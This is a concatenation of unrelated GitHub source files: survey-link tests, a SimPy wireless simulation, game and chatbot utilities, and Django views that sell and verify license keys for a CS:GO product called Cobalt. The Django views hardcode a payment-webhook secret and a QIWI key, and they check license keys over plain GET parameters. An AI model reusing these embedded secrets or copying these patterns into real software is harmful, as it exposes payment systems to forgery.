'\"\",\"\",\"\",\"\",\"{rnd_str}@{rnd_str}.com\",\"Email Not Sent Yet\",\"\",'\n '\"{url}\",\"2050-02-16 16:10:00\"'\n )\n url_template = (\n 'https://sshs.qualtrics.com/SE?'\n 'Q_DL={rnd_str}_{rnd_str}_MLRP_{rnd_str}&Q_CHL=gl'\n )\n urls = []\n for x in range(num_links):\n rnd_str = ''.join(random.choice(string.ascii_lowercase)\n for x in range(10))\n url = url_template.format(rnd_str=rnd_str)\n row_str = link_row_template.format(rnd_str=rnd_str, url=url)\n csv_rows.append(row_str)\n urls.append(url)\n content = \"\\n\".join(csv_rows)\n return (content, urls)\n\n\nclass TestSurveyLinksInconsistent(ConsistencyTestCase):\n \"\"\"Survey link queries behave correctly under eventual consistency.\"\"\"\n\n consistency_probability = 0\n\n def set_up(self):\n # Let ConsistencyTestCase set up the datastore testing stub.\n super(TestSurveyLinksInconsistent, self).set_up()\n\n # Needed for gcs interaction.\n self.testbed.init_app_identity_stub()\n self.testbed.init_urlfetch_stub()\n self.testbed.init_blobstore_stub()\n\n def test_create_links(self):\n \"\"\"Can import a csv from cloud storage.\"\"\"\n program_label = 'demo-program'\n content, urls = generate_csv_content(101)\n path = SurveyLink.import_path(program_label, 1, 'links.csv')\n with gcs.open(path, 'w') as fh:\n # Choose 101 to prove that we can 1) do more than a single batch of\n # 100 and 2) do a partial batch (the last one).\n fh.write(content)\n num_imported = SurveyLink.import_links(program_label, 1, 'links.csv')\n\n self.assertEqual(num_imported, 101)\n\n gcs.delete(path)\n\n def test_get_unique(self):\n \"\"\"Impossible for the same link to be assigned twice.\"\"\"\n kwargs = {'program_label': 'demo-program', 'survey_ordinal': 1}\n link1 = SurveyLink(id='foo', **kwargs)\n link2 = SurveyLink(id='bar', **kwargs)\n link1.put()\n link2.put()\n\n # Get each to sync up the datastore.\n link1.key.get()\n link2.key.get()\n\n # Delete one to try to trick the datastore.\n link1.key.delete()\n\n # Getting one should return 'bar' (but maybe not find any?).\n linkA_fetched = SurveyLink.get_unique('demo-program', 1)\n logging.info(linkA_fetched)\n self.assertNotEqual(linkA_fetched.url, link1.url)\n\n # Getting a second should definitely return None.\n linkB_fetched = SurveyLink.get_unique('demo-program', 1)\n logging.info(linkB_fetched)\n self.assertIsNone(linkB_fetched)\n\n def test_scoping(self):\n \"\"\"Links for different sessions and programs shouldn't cross.\"\"\"\n link1 = SurveyLink(id='foo1', program_label='foo', survey_ordinal=1)\n link2 = SurveyLink(id='foo2', program_label='foo', survey_ordinal=2)\n link3 = SurveyLink(id='bar1', program_label='bar', survey_ordinal=1)\n link1.put()\n link2.put()\n link3.put()\n\n # Get each to sync up the datastore.\n link1.key.get()\n link2.key.get()\n link3.key.get()\n\n self.assertEqual(SurveyLink.get_unique('foo', 1).url, link1.url)\n self.assertEqual(SurveyLink.get_unique('foo', 2).url, link2.url)\n self.assertEqual(SurveyLink.get_unique('bar', 1).url, link3.url)\n\n\nclass TestSurveyLinksConsistent(ConsistencyTestCase):\n \"\"\"Survey link queries don't show duplicates.\"\"\"\n\n # To know that there are no duplicate SurveyLink entities in the datastore,\n # we need to list all of them. The only way to do that is with a\n # consistent stub.\n consistency_probability = 1\n\n def set_up(self):\n # Let ConsistencyTestCase set up the datastore testing stub.\n super(TestSurveyLinksConsistent, self).set_up()\n\n # Needed for gcs interaction.\n self.testbed.init_app_identity_stub()\n self.testbed.init_urlfetch_stub()\n self.testbed.init_blobstore_stub()\n\n def test_duplicate_links_overwrite(self):\n \"\"\"Importing links should be idempotent.\"\"\"\n program_label = 'demo-program'\n content, urls = generate_csv_content(101)\n path = SurveyLink.import_path(program_label, 1, 'links.csv')\n with gcs.open(path, 'w') as fh:\n fh.write(content)\n\n # Import the same csv twice.\n SurveyLink.import_links(program_label, 1, 'links.csv')\n SurveyLink.import_links(program_label, 1, 'links.csv')\n\n # Still only 101.\n keys = [k for k in SurveyLink.query().iter(keys_only=True)]\n self.assertEqual(len(keys), 101)\n\n gcs.delete(path)\n","repo_name":"Stanford-PERTS/neptune","sub_path":"unit_testing/test_survey_links.py","file_name":"test_survey_links.py","file_ext":"py","file_size_in_byte":5449,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"21435786367","text":"import simpy\nKd = 10 #10对D2D设备\ntime_downlink = 10 #下行链路传输时间\ntime_dedicated = 10 #蜂窝用户专属传输时间\ntime_D2D = 1 #D2D传输时间\na = [0] * (Kd + 2)\na[0] = time_downlink\nfor i in range(1, Kd + 1):\n a[i] = time_D2D\na[Kd + 1] = time_dedicated\n\ndef EH(env):\n while True:\n print('%7.4f : BS开始给CU传输信息,同时DU收集能量' % env.now)\n yield env.timeout(a[0])\n print('%7.4f : 下行链路结束,同时D2D开始通信' % env.now)\n for i in range(1, Kd + 1):\n print('%7.4f : D2D%02d开始通信' % (env.now, i))\n yield env.timeout(a[i])\n print('%7.4f : D2D%02d结束通信' % (env.now, i))\n print('%7.4f : DUS结束通信关闭,CUS单独通信' % env.now)\n yield env.timeout(a[0])\n print('%7.4f : 上行链路结束,CUS关闭通信' % env.now)\n\n#仿真启动\nenv = simpy.Environment() #实例化环境\nenv.process(EH(env)) #添加汽车进程\nenv.run(until=100) #设定仿真结束条件,这里是100秒之后停止\n\n","repo_name":"hustfc/OJ","sub_path":"PYTHON/EH模块仿真.py","file_name":"EH模块仿真.py","file_ext":"py","file_size_in_byte":1046,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"83"} +{"seq_id":"24142644519","text":"import os\n\nfrom PIL import ImageDraw, ImageFont\n\n\ndef draw(predictions, image, image_name):\n draw_image = ImageDraw.Draw(image, \"RGBA\")\n\n image_width, image_height = image.size\n\n font = ImageFont.truetype(\"counter/resources/arial.ttf\", 20)\n i = 0\n for prediction in predictions:\n box = prediction.box\n draw_image.rectangle(\n [(box.xmin * image_width, box.ymin * image_height),\n (box.xmax * image_width, box.ymax * image_height)],\n outline='red')\n class_name = prediction.class_name\n draw_image.text(\n (box.xmin * image_width, box.ymin * image_height - font.getsize(class_name)[1]),\n f\"{class_name}: {prediction.score}\", font=font, fill='black')\n i += 1\n try:\n os.mkdir('tmp/debug')\n except OSError:\n pass\n image.save(f\"tmp/debug/{image_name}\", \"JPEG\")\n","repo_name":"efrnlsn/object-counter","sub_path":"counter/debug.py","file_name":"debug.py","file_ext":"py","file_size_in_byte":881,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"83"} +{"seq_id":"71704696912","text":"#https://codeforces.com/contest/703/problem/A\n\nn = int(input())\nmwins, cwins = 0, 0\nfor i in range(n):\n m, c = map(int, input().split())\n if m > c:\n mwins += 1\n elif m < c:\n cwins += 1\nif mwins == cwins:\n print(\"Friendship is magic!^^\")\nelse:\n print(\"Mishka\" if mwins > cwins else \"Chris\")","repo_name":"ByMykel/Codeforces","sub_path":"Python/0703A-MishkaandGame.py","file_name":"0703A-MishkaandGame.py","file_ext":"py","file_size_in_byte":318,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"70922071312","text":"import random\nfrom typing import List\n\nfrom src.core.elements import Elements\nfrom src.data.resources import ElementalResource, AttributeResource\nfrom src.elemental.attribute.attribute_factory import AttributeFactory\nfrom src.elemental.elemental import Elemental\nfrom src.elemental.species.felix import Felix\nfrom src.elemental.species.mithus import Mithus\nfrom src.elemental.species.nepharus import Nepharus\nfrom src.elemental.species.noel import Noel\nfrom src.elemental.species.npc_monsters.manapher import Manapher\nfrom src.elemental.species.npc_monsters.tophu import Tophu\nfrom src.elemental.species.rainatu import Rainatu\nfrom src.elemental.species.rex import Rex\nfrom src.elemental.species.roaus import Roaus\nfrom src.elemental.species.sithel import Sithel\nfrom src.elemental.species.slyfe import Slyfe\n\n\nclass ElementalInitializer:\n \"\"\"\n Factory methods for creating specific Elementals.\n \"\"\"\n\n SUMMONABLE_SPECIES = [Mithus(),\n Roaus(),\n Rainatu(),\n Sithel(),\n Felix(),\n Nepharus(),\n Slyfe(),\n Noel(),\n Rex()]\n\n ALL_SPECIES = SUMMONABLE_SPECIES + [\n Manapher(),\n Tophu()\n ]\n\n NAME_MAP = {}\n for species in ALL_SPECIES:\n NAME_MAP[species.name] = species\n\n @staticmethod\n def make(species, level=1) -> Elemental:\n \"\"\"\n :param species: Which subclass of Species\n :param level: How much to level up the Elemental\n \"\"\"\n elemental = Elemental(species,\n AttributeFactory.create_random())\n elemental.level_to(level)\n return elemental\n\n @staticmethod\n def from_server(resource: ElementalResource) -> Elemental:\n species_name = resource.species\n species = ElementalInitializer.NAME_MAP[species_name]\n attributes = [AttributeResource(**attribute) for attribute in resource.attributes]\n elemental = Elemental(species,\n AttributeFactory.create_from_resources(attributes),\n id=resource.id)\n elemental.load_from_resource(resource)\n return elemental\n\n @staticmethod\n def make_random(level=1, excluding: List[Elemental] = None, element: Elements = None) -> Elemental:\n \"\"\"\n :param level: The desired level of the Elemental.\n :param excluding: A List[Species] of elementals to exclude.\n :param element: Filter elementals by a specific element.\n :return: The summoned elemental.\n \"\"\"\n summonable_species = list(ElementalInitializer.SUMMONABLE_SPECIES)\n if element:\n summonable_species = [species for species in summonable_species if species.element == element]\n potential_species = None\n if excluding:\n excluded_species = [elemental.species.name for elemental in excluding]\n potential_species = [species for species in summonable_species\n if species.name not in excluded_species]\n if not potential_species or not excluding:\n potential_species = summonable_species\n pick = random.randint(0, len(potential_species) - 1)\n return ElementalInitializer.make(potential_species[pick], level)\n\n\ndef print_abilities():\n for species in ElementalInitializer.SUMMONABLE_SPECIES:\n print(species.name)\n for learnable in species.learnable_abilities:\n print(f\"Lv. {learnable.level_required} {learnable.name} \"\n f\"[{learnable.element} {learnable.category}]\\n\"\n f\"Mana cost: {learnable.mana_cost} Power: {learnable.attack_power}\\n\"\n f\"{learnable.description}\\n\")\n print('\\n')\n\n# print_abilities()\n","repo_name":"Hammerlord/Monbot","sub_path":"src/elemental/elemental_factory.py","file_name":"elemental_factory.py","file_ext":"py","file_size_in_byte":3861,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"83"} +{"seq_id":"42465157195","text":"from util import *\n\n\n\n\n@apply\ndef apply(given):\n A, B = given.of(Unequal)\n if B:\n assert not A\n A = B\n x = A.element_symbol()\n return Any[x](Element(x, A))\n\n\n@prove\ndef prove(Eq):\n from axiom import sets\n\n A = Symbol(etype=dtype.integer, given=True)\n Eq << apply(Unequal(A, A.etype.emptySet))\n\n Eq << sets.any_el.imply.ne_empty.apply(Eq[1])\n\n\n\n\n\n\n\n\n\n\nif __name__ == '__main__':\n run()\n# created on 2021-06-05\n","repo_name":"cosmosZhou/axiom","sub_path":"axiom/sets/ne_empty/given/any_el.py","file_name":"any_el.py","file_ext":"py","file_size_in_byte":450,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"83"} +{"seq_id":"11796093278","text":"from django.urls import path, include\nfrom django.contrib.auth import views as auth_views\nfrom . import views\n\n\nurlpatterns = [\n path('', views.home, name='home'),\n path('', include('django.contrib.auth.urls')),\n path('register/', views.register, name='register'),\n path('edit/', views.edit, name='edit'),\n path('/', views.user_detail, name='user_detail'),\n path('users/follow/', views.user_follow, name='user_follow'),\n\n]\n","repo_name":"ziyad00/curiouscat","sub_path":"account/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":451,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"12362117704","text":"import sys\nsys.stdin = open('1861in.txt','r')\n\ndef iswall(Y,X):\n if Y<0 or X<0 or Y>= N or X>=N:\n return True\n return False\n\ndef Miro(Y,X):\n global count\n dy = [0,0,-1,1]\n dx = [-1,1,0,0]\n for i in range(4):\n C_Y = Y+dy[i]\n C_X = X+dx[i]\n if (iswall(C_Y,C_X) == False) and (List[C_Y][C_X] - List[Y][X] ==1):\n count += 1\n Miro(C_Y, C_X)\n\nT = int(input())\nfor Count in range(T):\n print(\"#{} \".format(Count+1),end='')\n N = int(input())\n List = [list(map(int,input().split())) for _ in range(N)]\n Max_Count = 0\n Answer = []\n for Y in range(N):\n for X in range(N):\n count = 1\n Miro(Y,X)\n if Max_Count < count:\n Max_Count = count\n Answer= [List[Y][X]]\n if Max_Count == count:\n Max_Count = count\n Answer.append(List[Y][X])\n print(min(Answer),end=' ')\n print( Max_Count)","repo_name":"Jihyeok11/Algorithm","sub_path":"Python/SWExpert/모의평가/1861(정사각형방).py","file_name":"1861(정사각형방).py","file_ext":"py","file_size_in_byte":965,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"41567081935","text":"import unittest\nimport subprocess\nimport os\nimport shutil\n\nAUTO_GIT_SYNC_ENV_KEY = \"AUTO_GIT_SYNC_BRANCH\"\nIS_UPDATED_SH = \"/isUpdated.sh\"\nBIN_PATH = \"/tests/bin\"\nEXAMPLE_ENV_VAR = \"asoneuths\"\n\nTEST_DIR_PATH = '/tmp/test_dir'\n\nclass TestGitCheck(unittest.TestCase):\n\n def setUp(self):\n os.environ[AUTO_GIT_SYNC_ENV_KEY] = EXAMPLE_ENV_VAR\n self.original_path = os.environ[\"PATH\"]\n self.original_cwd = os.getcwd()\n self.cmd = [os.getcwd() + IS_UPDATED_SH]\n shutil.rmtree(TEST_DIR_PATH, ignore_errors=True)\n os.mkdir(TEST_DIR_PATH)\n\n def tearDown(self):\n os.environ[\"PATH\"] = self.original_path\n os.chdir(self.original_cwd)\n shutil.rmtree(TEST_DIR_PATH, ignore_errors=True)\n\n def exec(self, cmd=None):\n if cmd == None:\n cmd = self.cmd\n process = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n out, err = process.communicate()\n return out.decode('utf-8').rstrip('\\n'), err.decode('utf-8').rstrip('\\n')\n\n def test_without_git(self):\n os.environ[\"PATH\"] = os.getcwd() + BIN_PATH\n out, err = self.exec()\n self.assertEqual(err, \"git command not found\")\n self.assertEqual(out, \"\")\n\n def test_no_repo(self):\n os.chdir(TEST_DIR_PATH)\n out, err = self.exec()\n self.assertEqual(err, \"git repo not found\")\n self.assertEqual(out, \"\")\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"pidement/auto-git-sync","sub_path":"tests/unit/test_git_check.py","file_name":"test_git_check.py","file_ext":"py","file_size_in_byte":1463,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"83"} +{"seq_id":"33561128071","text":"from datetime import date\nfrom django.urls import path\nfrom . import views\n\nurlpatterns = [\n path('apt_requests/', views.AppointsRequestsView.as_view(), name='apt_requests'),\n path('pending_apts/', views.PendingAppointsView.as_view(), name='pending_apts'),\n path('update_apt//', views.AppointmentUpdateView.as_view(), name='update_apt'),\n path('update_apt_res//', views.AppointmentResponseUpdateView.as_view(), name='update_apt_res'),\n path('apt_status///', views.update_appointment_status, name='apt_status'),\n path('apt_status_res///', views.update_appointment_response_status, name='apt_status_res'),\n path('appointment_response//', views.AppointmentResponseView.as_view(), name='appointment_response'),\n path('all_users/', views.AllUsersList.as_view(), name='all_users'),\n path('calendar/', views.CalendarView.as_view(), name='calendar'),\n path('delete_appointment/', views.delete_appointment, name='delete_appointment'),\n path('delete_appointment_response/', views.delete_appointment_response, name='delete_appointment_response'),\n path('create_appoint/', views.TherapistCreateAppointmentView.as_view(), name='create_appoint'),\n path('disable_day//', views.disable_day, name='disable_day'),\n path('enable_day//', views.enable_day, name='enable_day'),\n path('disable_date/', views.DisableDatesView.as_view(), name='disable_dates'),\n path('enable_date//', views.enable_date, name='enable_date'),\n path('working_time/', views.WorkingTimeView.as_view(), name='working_time'),\n path('preferences/', views.PreferencesView.as_view(), name='preferences'),\n path('appoint_list/', views.AppointsView.as_view(), name='appoint_list'),\n path('create_comment/', views.CreateCommentView.as_view(), name='create_comment'),\n path('edit_comment//', views.EditCommentView.as_view(), name='edit_comment'),\n path('delete_comment//', views.delete_comment, name='delete_comment'),\n path('send_contact_email/', views.CreateContactMessageToPatient.as_view(), name='send_contact_email'),\n]","repo_name":"idosarue/appointments","sub_path":"appointments/therapist/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":2157,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"35003325839","text":"# coding=UTF-8\n# 生成词典\n\n'''\n@File: get_vocab\n@Author: WeiWei\n@Time: 2023/4/2\n@Email: weiwei_519@outlook.com\n@Software: PyCharm\n'''\n\nimport json\n\n\ndef get_dict(datas):\n word_count = {}\n for data in datas:\n data = data.strip().replace('\\t', '')\n for word in data:\n word_count.setdefault(word, 0)\n word_count[word] += 1\n word2id = {\"\": 0, \"\": 1, \"\": 2}\n\n temp = {word: i + len(word2id) for i, word in enumerate(word_count.keys())}\n word2id.update(temp)\n id2word = list(word2id.keys())\n return word2id, id2word\n\n\nif __name__ == '__main__':\n with open('dataset.txt', 'r', encoding='utf-8') as f:\n datas = f.readlines()\n word2id, id2word = get_dict(datas)\n\n dict_datas = {\"word2id\": word2id, \"id2word\": id2word}\n\n json.dump(dict_datas, open('dict_datas.json', 'w', encoding='utf-8'))\n","repo_name":"weiwei0519/chatbot","sub_path":"chatbot_with_gpt/get_vocab.py","file_name":"get_vocab.py","file_ext":"py","file_size_in_byte":876,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"83"} +{"seq_id":"43655541531","text":"import json\nimport xml.etree.ElementTree as ET\nfrom django.shortcuts import render\nfrom django.http import HttpResponse\nfrom .models import Keys, ForumTopic, Posts, Pays\nfrom datetime import datetime, date, timedelta\nfrom django.shortcuts import redirect\nimport django.http\nimport requests\nimport json\nfrom django.contrib.auth.models import User\nimport base64\nimport hmac\nimport hashlib\nfrom django.views.decorators.csrf import csrf_exempt\nimport smtplib\nfrom email.mime.multipart import MIMEMultipart\nfrom email.mime.text import MIMEText\nimport os, binascii\nimport secrets\n\n\ndef MainCSGO(request):\n return render(request, '../templates/csgo/main.html')\n\n\ndef Cobalt(request):\n return render(request, '../templates/csgo/cobalt.html')\n\n\ndef CobaltSuc(request):\n return render(request, '../templates/csgo/success.html')\n\ndef CobaltPayR30(request):\n if request.method == \"GET\":\n if request.user.is_authenticated:\n try:\n user_email = User.objects.get(username=request.user.username).email\n pay = Pays(email=user_email, length=30)\n pay.save()\n\n url = \"https://oplata.qiwi.com/create?publicKey=48e7qUxn9T7RyYE1MVZswX1FRSbE6iyCj2gCRwwF3Dnh5XrasNTx3BGPiMsyXQFNKQhvukniQG8RTVhYm3iPv7WmE6m9JsDkeLFCqcrGikz3z7eJ5AoBQnUvVTzsPNsYi7AqCa2DgRXY5vvPsZSVkTQZAbDFwLf4k8XdmdJuogWjXKx8GkQuEPuz5sYoR&\" \\\n \"&amount=99\" \\\n \"&billId=\" + str(pay.id) + \"\" \\\n \"&comment=\" + str(pay.id) + \"\" \\\n \"&successUrl=https%3A%2F%2Fmodernface.space%2Fcsgo%2Fcobalt%2Fpay%2Fsuccess\" \\\n \"&customFields%5BthemeCode%5D=Danyyl-EJa2htk5pl\" \\\n \"&email=\" + str(user_email.replace(\"@\", \"%40\"))\n\n context = {\"url\": url}\n\n return render(request, '../templates/csgo/pay.html', context)\n except:\n raise django.http.Http404\n else:\n return redirect('/accounts/login/')\n\n\ndef CobaltPayR90(request):\n if request.method == \"GET\":\n if request.user.is_authenticated:\n try:\n user_email = User.objects.get(username=request.user.username).email\n pay = Pays(email=user_email, length=90)\n pay.save()\n\n url = \"https://oplata.qiwi.com/create?publicKey=48e7qUxn9T7RyYE1MVZswX1FRSbE6iyCj2gCRwwF3Dnh5XrasNTx3BGPiMsyXQFNKQhvukniQG8RTVhYm3iPv7WmE6m9JsDkeLFCqcrGikz3z7eJ5AoBQnUvVTzsPNsYi7AqCa2DgRXY5vvPsZSVkTQZAbDFwLf4k8XdmdJuogWjXKx8GkQuEPuz5sYoR&\" \\\n \"&amount=249\" \\\n \"&billId=\" + str(pay.id) + \"\" \\\n \"&comment=\" + str(pay.id) + \"\" \\\n \"&successUrl=https%3A%2F%2Fmodernface.space%2Fcsgo%2Fcobalt%2Fpay%2Fsuccess\" \\\n \"&customFields%5BthemeCode%5D=Danyyl-EJa2htk5pl\" \\\n \"&email=\" + str(user_email.replace(\"@\", \"%40\"))\n\n context = {\"url\": url}\n\n return render(request, '../templates/csgo/pay.html', context)\n except:\n raise django.http.Http404\n else:\n return redirect('/accounts/login/')\n\n\n@csrf_exempt\ndef PayHook(request):\n raise Exception\n\n if request.method == \"POST\":\n hook_data = json.loads(request.body.decode('utf-8'))\n\n webhook_key_base64 = 'sxh0H+e1TOMts2qh0HO6S4bnvs5u4cbuIl2Sep9vPns='\n webhook_key = base64.b64decode(bytes(webhook_key_base64, 'utf-8'))\n data = str(hook_data[\"payment\"][\"sum\"][\"currency\"]) + \"|\" + str(hook_data[\"payment\"][\"sum\"][\"amount\"]) + \"|\" + str(hook_data[\"payment\"][\"type\"]) + \"|\" + str(hook_data[\"payment\"][\"account\"]) + \"|\" + str(hook_data[\"payment\"][\"txnId\"])\n\n if hmac.new(webhook_key, data.encode('utf-8'), hashlib.sha256).hexdigest() == hook_data[\"hash\"]:\n email = Pays.objects.get(id=hook_data[\"payment\"][\"comment\"]).email\n length = Pays.objects.get(id=hook_data[\"payment\"][\"comment\"]).length\n\n print(email)\n\n key_number = str(secrets.token_hex(2)) + \"-\" + str(secrets.token_hex(2)) + \"-\" + str(secrets.token_hex(2)) + \"-\" + str(secrets.token_hex(2))\n new_key = Keys(username=User.objects.get(email__exact=email).username, key=key_number, number_of_months=int(length))\n new_key.save()\n\n print(new_key.key)\n\n fromaddr = \"\"\n toaddr = email\n mypass = \"\"\n\n msg = MIMEMultipart()\n msg['From'] = fromaddr\n msg['To'] = toaddr\n msg['Subject'] = \"COBALT\"\n\n body = \"Thank you! Your key: \" + key_number + \". Download link: https://modernface.space/downloads/cobalt_updater.exe\"\n msg.attach(MIMEText(body, 'plain'))\n\n server = smtplib.SMTP('smtp.outlook.com')\n server.starttls()\n server.login(fromaddr, mypass)\n text = msg.as_string()\n server.sendmail(fromaddr, toaddr, text)\n server.quit()\n\n return redirect('/')\n else:\n raise django.http.Http404\n else:\n raise django.http.Http404\n\n\n\ndef CheckKey(request):\n if request.method == \"GET\":\n key = str(request.GET['key'])\n username = str(request.GET['username'])\n try:\n row = Keys.objects.get(key=key)\n\n correct_username = str(row.username)\n\n if username == correct_username:\n try:\n request.GET['activate']\n if row.activated == False:\n start_date = date(row.start_date.year, row.start_date.month, row.start_date.day)\n day_delta = (date.today() - start_date).days\n\n print(day_delta)\n\n if day_delta <= int(row.number_of_months):\n row.activated = True\n row.save()\n return HttpResponse('true')\n else:\n return HttpResponse('false')\n else:\n return HttpResponse('false')\n except:\n start_date = date(row.start_date.year, row.start_date.month, row.start_date.day)\n day_delta = (date.today() - start_date).days\n\n print(day_delta)\n\n if day_delta <= int(row.number_of_months):\n return HttpResponse('true')\n else:\n return HttpResponse('false')\n else:\n return HttpResponse('false')\n except:\n return HttpResponse('false')\n\n\ndef ForumMain(request):\n if request.method == \"GET\":\n context = {\"popular_topics\": [], \"last_topics\": []}\n\n counter = 0\n for i in ForumTopic.objects.order_by('-views'):\n if len(i.description) <= 200:\n context['popular_topics'].append({\"id\": i.id, \"name\": i.name, \"description\": i.description, \"views\": str(i.views), \"last_update\": str(i.last_update)[-2:] + \".\" + str(i.last_update)[5:7] + \".\" + str(i.last_update)[:4], \"number_of_posts\": str(i.number_of_posts)})\n else:\n context['popular_topics'].append({\"id\": i.id, \"name\": i.name, \"description\": i.description[:201] + '...', \"views\": str(i.views), \"last_update\": str(i.last_update)[-2:] + \".\" + str(i.last_update)[5:7] + \".\" + str(i.last_update)[:4], \"number_of_posts\": str(i.number_of_posts)})\n\n counter += 1\n if counter >= 5:\n break\n\n counter = 0\n for i in ForumTopic.objects.order_by('-id'):\n if len(i.description) <= 120:\n context['last_topics'].append({\"id\": i.id, \"name\": i.name, \"description\": i.description, \"views\": str(i.views),\n \"last_update\": str(i.last_update)[-2:] + \".\" + str(i.last_update)[5:7] + \".\" + str(i.last_update)[:4], \"number_of_posts\": str(i.number_of_posts)})\n else:\n context['last_topics'].append({\"id\": i.id, \"name\": i.name, \"description\": i.description[:201] + '...', \"views\": str(i.views),\n \"last_update\": str(i.last_update)[-2:] + \".\" + str(i.last_update)[5:7] + \".\" + str(i.last_update)[:4], \"number_of_posts\": str(i.number_of_posts)})\n\n counter += 1\n if counter >= 7:\n break\n\n counter = 0\n counter_id = 0\n themes_list = []\n for i in ForumTopic.objects.order_by('?'):\n try:\n while True:\n item = ForumTopic.objects.order_by('?')[counter_id]\n if item.subject not in themes_list:\n themes_list.append(item.subject)\n counter_id += 1\n break\n else:\n counter_id += 1\n except IndexError:\n pass\n\n counter += 1\n if counter >= 7:\n break\n\n context['themes'] = themes_list\n\n return render(request, '../templates/csgo/forum/main_forum.html', context)\n elif request.method == \"POST\":\n text = request.POST.get(\"search_topic\")\n\n return redirect('/csgo/forum/search_topic/?search=' + text)\n\n\ndef Topic(request):\n if request.method == \"GET\":\n try:\n topic_id = str(request.GET['topic_id'])\n topic_name = ForumTopic.objects.get(id=topic_id).name[:20]\n topic_name_full = ForumTopic.objects.get(id=topic_id).name\n topic_date = ForumTopic.objects.get(id=topic_id).creation_date\n topic_subject = ForumTopic.objects.get(id=topic_id).subject\n topic_description = ForumTopic.objects.get(id=topic_id).description\n topic_author = ForumTopic.objects.get(id=topic_id).author\n\n is_super_topic = ForumTopic.objects.get(id=topic_id).is_super_topic\n\n posts = Posts.objects.filter(topic_id=int(topic_id)).order_by(\"creation_datetime\")\n numbers_of_posts = Posts.objects.filter(topic_id=topic_id).count()\n list_of_posts = []\n\n\n for i in posts:\n post = {}\n post[\"author\"] = i.author\n post['datetime'] = i.creation_datetime\n post['text'] = i.text\n list_of_posts.append(post)\n\n\n context = {\"topic_id\": topic_id, \"topic_name\": topic_name, \"topic_name_full\": topic_name_full, \"topic_date\": topic_date, \"topic_subject\": topic_subject,\n \"topic_description\": topic_description, \"topic_author\": topic_author, \"posts\": list_of_posts, \"is_super_topic\": is_super_topic}\n\n\n topic_state = ForumTopic.objects.get(id=topic_id)\n topic_state.views += 1\n topic_state.number_of_posts = numbers_of_posts\n topic_state.save()\n\n return render(request, '../templates/csgo/forum/topic.html', context)\n except:\n raise django.http.Http404\n\n\ndef NewPost(request):\n if request.user.is_authenticated:\n if request.method == \"GET\":\n context = {}\n\n try:\n topic_id = str(request.GET['topic_id'])\n\n context[\"topic_id\"] = topic_id\n except:\n raise django.http.Http404\n\n return render(request, '../templates/csgo/forum/new_post.html', context)\n elif request.method == \"POST\":\n try:\n topic_id = str(request.GET['topic_id'])\n\n text = request.POST.get(\"text\")\n user = request.user.username\n\n new_post = Posts(topic_id=topic_id, author=user, text=text)\n new_post.save()\n\n topic = ForumTopic.objects.get(id=topic_id)\n topic.last_update = datetime.today().date()\n topic.save()\n\n return redirect('/csgo/forum/topic/?topic_id='+ topic_id)\n except:\n raise django.http.Http404\n else:\n return redirect('/accounts/login/')\n\n\ndef NewTopic(request):\n if request.user.is_authenticated:\n if request.method == \"GET\":\n context = {}\n\n # try:\n #\n # except:\n # raise django.http.Http404\n\n return render(request, '../templates/csgo/forum/new_topic.html', context)\n elif request.method == \"POST\":\n try:\n text = request.POST.get(\"text\")\n name = request.POST.get(\"title\")\n theme = request.POST.get(\"themes\")\n user = request.user.username\n\n print(theme)\n\n new_topic = ForumTopic(author=user, description=text, name=name, subject=theme, views=1, last_update=datetime.today().date(), number_of_posts=0)\n new_topic.save()\n\n\n return redirect('/csgo/forum/')\n except:\n raise django.http.Http404\n else:\n return redirect('/accounts/login/')\n\n\ndef ThemesList(request):\n context = {}\n try:\n theme = str(request.GET['theme'])\n\n context = {\"themes\": [], \"theme\": theme}\n\n for i in ForumTopic.objects.filter(subject=theme):\n if len(i.description) <= 200:\n context['themes'].append(\n {\"id\": i.id, \"name\": i.name, \"description\": i.description, \"views\": str(i.views),\n \"last_update\": str(i.last_update)[-2:] + \".\" + str(i.last_update)[5:7] + \".\" + str(i.last_update)[\n :4],\n \"number_of_posts\": str(i.number_of_posts)})\n else:\n context['themes'].append(\n {\"id\": i.id, \"name\": i.name, \"description\": i.description[:201] + '...', \"views\": str(i.views),\n \"last_update\": str(i.last_update)[-2:] + \".\" + str(i.last_update)[5:7] + \".\" + str(i.last_update)[\n :4],\n \"number_of_posts\": str(i.number_of_posts)})\n\n return render(request, '../templates/csgo/forum/themes_list.html', context)\n except:\n raise django.http.Http404\n\n\ndef SearchTopic(request):\n text = request.GET.get(\"search\")\n\n results = ForumTopic.objects.filter(name__contains=text)\n results_themes = ForumTopic.objects.filter(subject__contains=text)\n\n search = str(request.GET['search'])\n\n context = {\"results\": [], \"results_themes\": [], \"search\": search}\n\n for i in results:\n if len(i.description) <= 200:\n context['results'].append(\n {\"id\": i.id, \"name\": i.name, \"description\": i.description, \"views\": str(i.views),\n \"last_update\": str(i.last_update)[-2:] + \".\" + str(i.last_update)[5:7] + \".\" + str(i.last_update)[\n :4],\n \"number_of_posts\": str(i.number_of_posts)})\n else:\n context['results'].append(\n {\"id\": i.id, \"name\": i.name, \"description\": i.description[:201] + '...', \"views\": str(i.views),\n \"last_update\": str(i.last_update)[-2:] + \".\" + str(i.last_update)[5:7] + \".\" + str(i.last_update)[\n :4],\n \"number_of_posts\": str(i.number_of_posts)})\n\n for i in results_themes:\n if len(i.description) <= 200:\n context['results_themes'].append(\n {\"id\": i.id, \"name\": i.name, \"description\": 